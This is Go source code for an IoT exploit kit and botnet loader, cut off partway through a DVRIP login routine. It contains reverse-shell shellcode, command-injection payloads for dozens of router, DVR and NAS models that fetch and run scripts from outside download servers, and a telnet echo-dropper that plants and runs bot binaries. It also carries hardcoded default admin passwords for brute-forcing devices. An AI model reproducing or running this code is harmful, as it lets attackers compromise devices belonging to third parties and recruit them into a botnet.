package main import ( "net" "time" "bufio" "fmt" "os" "sync" "strings" "strconv" "io/ioutil" "math/rand" "encoding/binary" "encoding/base64" ) /* Exploit kit framework 1.0.0. Contains: Reverse shell loader (DONE) Telnet loader (arch detect, dir detect, echo load) (DONE) Exploits: UCHTTPD (DONE) TVT-4567 (DONE) TVT-WEB (DONE) UNIX CCTV (DONE) FIBERHOME ROUTER (DONE) VIGOR ROUTER (DONE) COMTREND ROUTER (DONE) GPONFIBER ROUTER (DONE) BROADCOM ROUTER (DONE) DVRIP (DONE) LIBDVR (DONE) HONGDIAN ROUTER (DONE) REALTEK MULTI ROUTER (DONE) TENDA ROUTER (DONE) TOTOLINK ROUTER (DONE) ALCATEL NAS (DONE) LILINDVR (DONE) LINKSYS ESERIES (DONE) */ const ( EI_NIDENT int = 16 EI_DATA int = 5 EE_LITTLE int = 1 EE_BIG int = 2 EM_ARM int = 40 EM_MIPS int = 8 EM_AARCH64 int = 183 EM_PPC int = 20 EM_PPC64 int = 21 EM_SH int = 42 DVRIP_NORESP int = 0 DVRIP_OK int = 100 DVRIP_FAILED int = 203 DVRIP_UPGRADED int = 515 echoLineLen = 128 echoDlrOutFile = "qn_local" loaderTvtWebTag = "selfrep.tvt" loaderTvt4567Tag = "selfrep.tvt" loaderVigorTag = "selfrep.vigor" loaderComtrendTag = "selfrep.comtrend" loaderGponfiberTag = "selfrep.gponfiber" loaderFiberhomeTag = "selfrep.fiberhome" loaderLibdvrTag = "selfrep.libdvr" loaderDvripTag = "selfrep.dvrip" loaderUchttpdTag = "selfrep.uchttpd" loaderHongdianTag = "selfrep.hongdian" loaderTendaTag = "selfrep.tenda" loaderTotolinkTag = "selfrep.totolink" loaderZyxelTag = "selfrep.zyxel" loaderAlcatleTag = "selfrep.alcatel" loaderLilinTag = "selfrep.lilin" loaderLinksysTag = "selfrep.linksys" loaderZteTag = "selfrep.zte" loaderNetgearTag = "selfrep.netgear" loaderDlinkTag = "selfrep.dlink" loaderDownloadServer = "1.1.1.1" // Remote IP Of Server With Bins And Sh Files loaderBinsLocation = "/a/b/" // Path To Bins loaderScriptsLocation = "/a/" // Path To Bins ) type elfHeader struct { e_ident[EI_NIDENT] int8 e_type, e_machine int16 e_version int32 } type smapsRegion struct { region uint64 size, pss, rss int shared_clean, shared_ditry int private_clean, private_dirty int } type echoDropper struct { payload [128]string payload_count int } var ( netTimeout time.Duration = 30 workerGroup sync.WaitGroup magicGroup sync.WaitGroup mode, doExploit string exploitMap map[string]interface{} dropperMap map[string]echoDropper ) // counters var telShells, payloadSent int var ( // uc exploit settings // should be reverse shell to same ip as loader on port 31391 uchttpdShellCode string = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde" ucRshellPort int = 31412 // tvt exploit settings tvtWebPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvtWebTag tvt4567Payload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvt4567Tag // magic exploit settings magicPacketIds []string = []string{"\x62", "\x69", "\x6c", "\x52", "\x44", "\x67", "\x43", "\x4d"} magicPorts []int = []int{1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8010, 8020, 8030, 8040, 8050, 8060, 8070, 8080, 8090, 8100, 8200, 8300, 8400, 8500, 8600, 8700, 8800, 8888, 8900, 8999, 9000, 9090} magicPayload string = "wget http://rippr.cc/u -O-|sh;" // lilindvr payload lilinPayload string = "wget -O- http://" + loaderDownloadServer + "/l|sh" // fiberhome exploit settings fiberRandPort int = 1 // 0 for use below fiberStaticPort int = 31784 fiberSecStrs []string = []string{"0.3123525368318707", "0.13378587435314315", "0.8071510413685209"} // vigor exploit settings vigorPayload string = "bin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F" + loaderDownloadServer + loaderBinsLocation + "bot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Dbot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Fbot.arm7%24%7BIFS%7D" + loaderVigorTag + "%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Dbot.arm7" // broadcom router settings broadcomPayload string = "$(wget%20http://" + loaderDownloadServer + "/b%20-O-|sh)" // hongdian router settings hongdianPayload string = "cd+/tmp%3Bbusybox+wget+http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh+-O-+>sfs;chmod+777+sfs%3Bsh+sfs+" + loaderHongdianTag + "%3Brm+-rf+sfs" // tenda router settings tendaPayload string = "cd%20/tmp%3Brm%20wget.sh%3Bwget%20http%3A//" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%3Bchmod%20777%20wget.sh%3Bsh%20wget.sh%20" + loaderTendaTag // totlink router settings totolinkPayload string = "wget%20http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%20-O%20-%20%3Esplash.sh%3B%20chmod%20777%20splash.sh%3B%20sh%20splash.sh%20" + loaderTotolinkTag // zyxel nas settings zyxelPayload string = "cd%20/tmp;wget%20http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20" + loaderZyxelTag + ";" zyxelPayloadTwo string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh" // alcatel nas settings alcatelPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderAlcatleTag // linksys router settings linksysPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh" linksysTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh" // zte router settings ztePayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh" // netgear router settings netgearPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderNetgearTag + "%3Brm+-rf+wget.sh" // gpon router settings gponOGPayload string = "wget+http%3A%2F%2F" + loaderDownloadServer + "%2Fg+-O-%7Csh%60%3Bwget+http%3A%2F%2F37.0.11.220%2Fg+-O-%7Csh" // dlink router settings dlinkTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderDlinkTag + "%3Brm+-rf+wget.sh" dlinkThreePayload string = "cd /tmp;wget http://" + loaderDownloadServer + "/a/wget.sh;chmod 777 wget.sh;sh wget.sh " + loaderDlinkTag + ";rm -rf wget.sh" ) func zeroByte(a []byte) { for i := range a { a[i] = 0 } } func getStringInBetween(str string, start string, end string) (result string) { s := strings.Index(str, start) if s == -1 { return } s += len(start) e := strings.Index(str, end) if (s > 0 && e > s + 1) { return str[s:e] } else { return "null" } } func randStr(strlen int) (string) { var b strings.Builder rand.Seed(time.Now().UnixNano()) chars := []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz") for i := 0; i < strlen; i++ { b.WriteRune(chars[rand.Intn(len(chars))]) } return b.String() } func hexToInt(hexStr string) (uint64) { cleaned := strings.Replace(hexStr, "0x", "", -1) result, _ := strconv.ParseUint(cleaned, 16, 64) return uint64(result) } /* TELNET LOADER MODULE */ func telnetLoadDroppers() { files, err := ioutil.ReadDir("dlrs") if err != nil { fmt.Printf("\033[1;31mError: Failed to open dlrs/\r\n") os.Exit(0) } for i := 0; i < len(files); i++ { file, err := os.OpenFile("dlrs/" + files[i].Name(), os.O_RDONLY, 0755) if err != nil { continue } mapVal := echoDropper{} mapVal.payload_count = 0 for { var echoString string dataBuf := make([]byte, echoLineLen) length, err := file.Read(dataBuf) if err != nil || length <= 0 { break } for i := 0; i < length; i++ { echoByte := fmt.Sprintf("\\x%02x", uint8(dataBuf[i])) echoString += echoByte } if mapVal.payload_count == 0 { mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" > ", echoString) } else { mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" >> ", echoString) } mapVal.payload_count++ } dropperMap[files[i].Name()] = mapVal file.Close() } fmt.Printf("\x1b[38;5;46mLoader\x1b[38;5;15m: \x1b[38;5;15mLoaded \x1b[38;5;134m%d\x1b[38;5;15m echo droppers\x1b[38;5;15m\x1b[38;5;15m\r\n", len(dropperMap)) } func telnetHasPrompt(buffer string) (bool) { if strings.Contains(buffer, "#") || strings.Contains(buffer, ">") || strings.Contains(buffer, "$") || strings.Contains(buffer, "%") || strings.Contains(buffer, "@") { return true } else { return false } } func telnetBusyboxShell(conn net.Conn) { /* Looks wierd but dw its for some BCM router */ conn.Write([]byte("sh\r\n")) conn.Write([]byte("..\r\n")) conn.Write([]byte("linuxshell\r\n")) /* ------------------------------------------ */ conn.Write([]byte("enable\r\n")) conn.Write([]byte("development\r\n")) conn.Write([]byte("system\r\n")) conn.Write([]byte("sh\r\n")) conn.Write([]byte("shell\r\n")) conn.Write([]byte("ping ; sh\r\n")) } func telnetDropDropper(conn net.Conn, myarch string) (bool) { for arch, mapval := range dropperMap { splitVal := strings.Split(arch, ".") if len(splitVal) != 2 { continue } if splitVal[1] == myarch { query := randStr(5) dropper := randStr(5) droppedLines := 0 for i := 0; i < mapval.payload_count; i++ { var rdbuf []byte = []byte("") complete := 0 conn.Write([]byte(mapval.payload[i] + dropper + "; /bin/busybox " + query + "\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), ": applet not found") { complete = 1 break } } if complete == 0 { return false } droppedLines++ } if droppedLines == mapval.payload_count { var rdbuf []byte = []byte("") conn.Write([]byte("chmod 777 " + dropper + "; ./" + dropper + "; rm -rf " + dropper + "; /bin/busybox " + query + "\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), ": applet not found") { return true } } return false } else { return false } } else { continue } } return false } func telnetHasBusybox(conn net.Conn) (bool, string) { var rdbuf []byte = []byte("") query := randStr(6) resp := ": applet not found" conn.Write([]byte("/bin/busybox " + query + "\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), resp) == true { index := strings.Index(string(rdbuf), "BusyBox v") if index == -1 { return true, "unknown" } else { verstr := strings.Split(string(rdbuf)[len("BusyBox v")+index:], " ") if len(verstr) > 0 { return true, verstr[0] } else { return true, "unknown" } } } } return false, "unknown" } func telnetWritableDir(conn net.Conn) (bool, string) { var rdbuf []byte dirs := []string{"/tmp/", "/var/tmp/", "/var/", "/mnt/", "/etc/", "/", "/dev/"} for i := 0; i < len(dirs); i++ { echoStr := randStr(4) conn.Write([]byte("cd " + dirs[i] + " && echo " + echoStr + "\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "can't cd") || strings.Contains(string(rdbuf), "No such file or") { break } else if strings.Contains(string(rdbuf), echoStr) { return true, dirs[i] } } zeroByte(rdbuf) } return false, "none" } func telnetExtractArch(conn net.Conn) (bool, string) { var rdbuf []byte var index int = -1 conn.Write([]byte("/bin/busybox cat /bin/echo\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) index = strings.Index(string(rdbuf), "ELF") if index != -1 { zeroByte(tmpbuf) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) break } } if index == -1 { return false, "none" } rdbuf = rdbuf[index:] elfHdr := elfHeader{} for i := 0; i < EI_NIDENT; i++ { elfHdr.e_ident[i] = int8(rdbuf[i]) } elfHdr.e_type = int16(rdbuf[EI_NIDENT]) elfHdr.e_machine = int16(rdbuf[EI_NIDENT + 2]) elfHdr.e_version = int32(rdbuf[EI_NIDENT + 2 + 2]) if elfHdr.e_machine == int16(EM_ARM) { return true, "arm" } else if elfHdr.e_machine == int16(EM_MIPS) { if elfHdr.e_ident[EI_DATA] == int8(EE_LITTLE) { return true, "mpsl" } else { return true, "mips" } } else if elfHdr.e_machine == int16(EM_PPC) || elfHdr.e_machine == int16(EM_PPC64) { return true, "ppc" } else if elfHdr.e_machine == int16(EM_SH) { return true, "sh4" } return false, "" } func telnetLoader(target string, dologin int, arch string, tag string) { var ( rdbuf []byte = []byte("") loggedIn int = 0 ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } if dologin == 0 { for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if telnetHasPrompt(string(rdbuf)) == true { loggedIn = 1 break } } } zeroByte(rdbuf) if loggedIn == 0 { conn.Close() return } fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m shell found on device\x1b[38;5;15m\x1b[38;5;15m\r\n", target) telnetBusyboxShell(conn) has, ver := telnetHasBusybox(conn) if has == false { conn.Close() return } fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m device is running busybox version \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver) telShells++ has, dir := telnetWritableDir(conn) if has == false { conn.Close() return } fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s\x1b[38;5;15m found writable directory \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir) has, _ = telnetHasBusybox(conn) if has == false { conn.Close() return } fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s\x1b[38;5;15m extracted arch \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir, arch) dropped := telnetDropDropper(conn, arch) if dropped == false { conn.Close() return } fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s:%s\x1b[38;5;15m finnished echo loading\x1b[38;5;15m\r\n", target, ver, dir, arch) binName := randStr(6) conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + tag + "\r\n")) // Done? time.Sleep(5 * time.Second) conn.Close() return } /* ------ END OF TELNET LOADER ------- */ /* ------ OTHER PROTOCOL STUFF ------- */ func reverseShellUchttpdLoader(conn net.Conn) { var ( rdbuf []byte = []byte("") query string = randStr(5) ) conn.Write([]byte(">/tmp/.h && cd /tmp/\r\n")) conn.Write([]byte(">/mnt/.h && cd /mnt/\r\n")) conn.Write([]byte(">/var/.h && cd /var/\r\n")) conn.Write([]byte(">/dev/.h && cd /dev/\r\n")) conn.Write([]byte(">/var/tmp/.h && cd /var/tmp/\r\n")) conn.Write([]byte("/bin/busybox " + query + "\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() return } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), ": applet not found") { break } } zeroByte(rdbuf) dropped := telnetDropDropper(conn, "arm7") if dropped == false { conn.Close() return } fmt.Printf("\x1b[38;5;46mUchttpd\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr()) payloadSent++ binName := randStr(6) conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + loaderUchttpdTag + ";\r\n")) conn.Write([]byte("/var/Sofia 2>/dev/null &\r\n")) return } func infectFunctionTvt4567(conn net.Conn) { var ( rdbuf []byte = []byte("") state = 0 ) payload := "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00\x50\x02\x00\x00\x50\x02\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x75\x74\x66\x2d\x38\x22\x3f\x3e\x3c\x72\x65\x71\x75\x65\x73\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x73\x79\x73\x74\x65\x6d\x54\x79\x70\x65\x3d\x22\x4e\x56\x4d\x53\x2d\x39\x30\x30\x30\x22\x20\x63\x6c\x69\x65\x6e\x74\x54\x79\x70\x65\x3d\x22\x57\x45\x42\x22\x3e\x3c\x74\x79\x70\x65\x73\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x61\x6c\x6c\x6f\x77\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x72\x61\x6e\x67\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x6d\x61\x63\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x2f\x74\x79\x70\x65\x73\x3e\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x22\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x3e\x3c\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x20\x74\x79\x70\x65\x3d\x22\x6c\x69\x73\x74\x22\x3e\x3c\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x22\x2f\x3e\x3c\x2f\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x69\x74\x65\x6d\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x69\x70\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x69\x70\x3e\x24\x28" payload += tvt4567Payload payload += "\x3c\x2f\x69\x70\x3e\x3c\x2f\x69\x74\x65\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x3e\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x3e\x00" payload = base64.StdEncoding.EncodeToString([]byte(payload)) cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("{D79E94C5-70F0-46BD-965B-E17497CCB598}")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "{D79E94C5-70F0-46BD-965B-E17497CCB598}") && state != 1 { conn.Write([]byte("GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: " + cntlen + "\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n" + payload + "\r\n\r\n")) zeroByte(rdbuf) state = 1 continue } else if strings.Contains(string(rdbuf), "200") && state == 1 { fmt.Printf("\x1b[38;5;46mTvt-4567\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr().String()) conn.Close() payloadSent++ return } } conn.Close() } func infectFunctionMagicProto(target string) { var ( rdbuf []byte = []byte("") state = 0 ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { magicGroup.Done() return } payloadOne := "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00" payloadTwo := "\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26" payloadThree := "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00" conn.Write([]byte("\x5a\xa5\x01\x20\x00\x00\x00\x00")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if state == 0 && len(rdbuf) >= 4 && string(rdbuf[:4]) == "\x5a\xa5\x01\x20" { conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { magicGroup.Done() return } payload := payloadOne payload += magicPacketIds[state] payload += payloadTwo payload += magicPayload + "f" payload += payloadThree conn.Write([]byte(payload)) state++ zeroByte(rdbuf) continue } else if state >= 1 { conn.Close() if state == 8 { fmt.Printf("\x1b[38;5;46mMagic\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ magicGroup.Done() return } conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { magicGroup.Done() return } payload := payloadOne payload += magicPacketIds[state] payload += payloadTwo payload += magicPayload + "f" payload += payloadThree conn.Write([]byte(payload)) state++ zeroByte(rdbuf) continue } } conn.Close() magicGroup.Done() return } func infectFunctionLibdvrProto(host string, attempt int) (int, error, string, int) { var gotAdmin int = 0 var gotShell int = 0 var password string var rInt int = 0 rInt = rand.Intn(9999 - 9000) + 9000 conn, err := net.DialTimeout("tcp", host, time.Duration(10) * time.Second) if err != nil { return 0, nil, "", 0 } defer conn.Close() conn.SetWriteDeadline(time.Now().Add(6 * time.Second)) _, err = conn.Write([]byte("/bin/busybox BOXOFABOX\n")) if err != nil { conn.Close() return 0, nil, "", 0 } conn.SetReadDeadline(time.Now().Add(6 * time.Second)) first_buf := make([]byte, 256) l, err := conn.Read(first_buf) if err != nil || l <= 0 { conn.Close() return 0, nil, "", 0 } if strings.Contains(string(first_buf), "user name") || strings.Contains(string(first_buf), "username") { _, err = conn.Write([]byte("admin\n")) if err != nil { conn.Close() return 0, nil, "", 0 } } else { if strings.Contains(string(first_buf), "BOXOFABOX: applet not found") { gotShell = 1 } else { _, err = conn.Write([]byte("\n")) if err != nil { conn.Close() return 0, nil, "", 0 } conn.SetReadDeadline(time.Now().Add(3 * time.Second)) first_buf := make([]byte, 256) l, err := conn.Read(first_buf) if err != nil || l <= 0 { conn.Close() return 0, nil, "", 0 } if !strings.Contains(string(first_buf), "user name") && !strings.Contains(string(first_buf), "username") { if strings.Contains(string(first_buf), "admin$") { gotAdmin = 1 } else { conn.Close() return 0, nil, "", 0 } } else { _, err = conn.Write([]byte("admin\n")) if err != nil { conn.Close() return 0, nil, "", 0 } } } } if gotAdmin != 1 && gotShell != 1 { conn.SetReadDeadline(time.Now().Add(3 * time.Second)) second_buf := make([]byte, 256) l2, err := conn.Read(second_buf) if err != nil || l2 <= 0 { conn.Close() return 0, nil, "", 0 } if strings.Contains(string(second_buf), "pass word") || strings.Contains(string(second_buf), "password") { if attempt == 0 { password = "I0TO5Wv9" } else if attempt == 1 { password = "123456" } else if attempt == 2 { password = "admin" } _, err = conn.Write([]byte(password + "\n")) if err != nil { conn.Close() return 0, nil, "", 0 } conn.SetReadDeadline(time.Now().Add(3 * time.Second)) second_buf := make([]byte, 1024) l, err := conn.Read(second_buf) if err != nil || l <= 0 { conn.Close() return 0, nil, "", 0 } if strings.Contains(string(second_buf), "admin$") { gotAdmin = 1 } else { conn.Close() return 0, nil, "", 0 } } else if strings.Contains(string(second_buf), "admin$") { gotAdmin = 1 } else { conn.Close() return 0, nil, "", 0 } } if gotAdmin == 1 || gotShell == 1 { conn.Write([]byte("shell\n")) conn.Write([]byte("/bin/busybox BOXOFABOX\n")) new_buf := make([]byte, 128) l, err := conn.Read(new_buf) if err != nil || l <= 0 { conn.Close() return 0, nil, "", 0 } if strings.Contains(string(new_buf), "BOXOFABOX: applet not found") { conn.Write([]byte("/bin/busybox telnetd -p" + strconv.Itoa(rInt) + " -l/bin/sh\n")) conn.Write([]byte("exit\n")) conn.Write([]byte("quit\n")) conn.Close() time.Sleep(3 * time.Second) return 1, nil, password, rInt } else { conn.Write([]byte("exit\n")) conn.Write([]byte("quit\n")) conn.Close() return 0, nil, "", 0 } } else { conn.Write([]byte("quit\n")) conn.Close() return 0, nil, "", 0 } } func infectFunctionLibdvr(target string) { splitStr := strings.Split(target, ":") for i := 0; i < 3; i++ { exploited, err, _, port := infectFunctionLibdvrProto(target, i) if err != nil { return } if exploited == 1 { fmt.Printf("\x1b[38;5;46mLibdvr\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell\x1b[38;5;15m\r\n", target) telnetLoader(splitStr[0] + ":" + strconv.Itoa(port), 0, "arm7", loaderLibdvrTag) return } } } func infectFunctionDvrip(target string) { var ( bytebuf []byte = []byte("") adminPasswords []string = []string{"tlJwpbo6", "S2fGqNFs", "OxhlwSG8", "ORsEWe7l", "nTBCS19C"} username string = "admin" password string = "" attempt int = 0 authed int = 0 ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } for { if attempt >= 5 { break } else { password = adminPasswords[attempt] } conn.Write([]byte("\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x64\x00\x00\x00{ \"EncryptType\" : \"MD5\", \"LoginType\" : \"DVRIP-Web\", \"PassWord\" : \"" + password + "\", \"UserName\" : \"" + username + "\" }\x0a")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } bytebuf = append(bytebuf, tmpbuf...) if strings.Contains(string(bytebuf), "}") { break } } dvrret, err := strconv.Atoi(getStringInBetween(string(bytebuf), "\"Ret\" : ", ", \"SessionID")) if err != nil { authed = 0 break } if dvrret == DVRIP_OK { authed = 1 } dvrret = DVRIP_NORESP if authed == 1 { break } attempt++ continue } if authed != 1 { conn.Close() return } conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x03\x35\x00\x00\x00{ \"Name\" : \"KeepAlive\", 